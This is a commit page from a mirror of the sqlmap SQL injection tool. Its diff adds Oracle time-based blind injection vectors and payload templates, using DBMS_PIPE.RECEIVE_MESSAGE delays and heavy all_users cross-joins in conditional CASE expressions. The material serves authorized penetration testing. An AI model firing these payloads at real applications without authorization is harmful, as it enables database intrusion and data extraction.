mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2025-11-04 18:07:46 +03:00
added vectors for Oracle time-based payloads
This commit is contained in:
Miroslav Stampar
parent
2af8835a94
commit
f9085e01e7
|
|
@ -1466,6 +1466,7 @@ Formats:
|
||||||
<risk>1</risk>
|
<risk>1</risk>
|
||||||
<clause>1,2,3</clause>
|
<clause>1,2,3</clause>
|
||||||
<where>1</where>
|
<where>1</where>
|
||||||
|
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)</vector>
|
||||||
<request>
|
<request>
|
||||||
<payload>AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])</payload>
|
<payload>AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])</payload>
|
||||||
</request>
|
</request>
|
||||||
|
|
@ -1484,8 +1485,9 @@ Formats:
|
||||||
<risk>1</risk>
|
<risk>1</risk>
|
||||||
<clause>1,2,3</clause>
|
<clause>1,2,3</clause>
|
||||||
<where>1</where>
|
<where>1</where>
|
||||||
|
<vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5) ELSE [RANDNUM] END)</vector>
|
||||||
<request>
|
<request>
|
||||||
<payload>AND (SELECT COUNT(*) FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5)>0</payload>
|
<payload>AND [RANDNUM]=(SELECT COUNT(*) FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5)</payload>
|
||||||
</request>
|
</request>
|
||||||
<response>
|
<response>
|
||||||
<time>[DELAYED]</time>
|
<time>[DELAYED]</time>
|
||||||
|
|
@ -1621,6 +1623,7 @@ Formats:
|
||||||
<risk>3</risk>
|
<risk>3</risk>
|
||||||
<clause>1,2,3</clause>
|
<clause>1,2,3</clause>
|
||||||
<where>2</where>
|
<where>2</where>
|
||||||
|
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)</vector>
|
||||||
<request>
|
<request>
|
||||||
<payload>OR [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])</payload>
|
<payload>OR [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])</payload>
|
||||||
</request>
|
</request>
|
||||||
|
|
@ -1639,8 +1642,9 @@ Formats:
|
||||||
<risk>4</risk>
|
<risk>4</risk>
|
||||||
<clause>1,2,3</clause>
|
<clause>1,2,3</clause>
|
||||||
<where>2</where>
|
<where>2</where>
|
||||||
|
<vector>OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5) ELSE [RANDNUM] END)</vector>
|
||||||
<request>
|
<request>
|
||||||
<payload>OR (SELECT COUNT(*) FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5)>0</payload>
|
<payload>OR [RANDNUM]=(SELECT COUNT(*) FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5)</payload>
|
||||||
</request>
|
</request>
|
||||||
<response>
|
<response>
|
||||||
<time>[DELAYED]</time>
|
<time>[DELAYED]</time>
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue
Block a user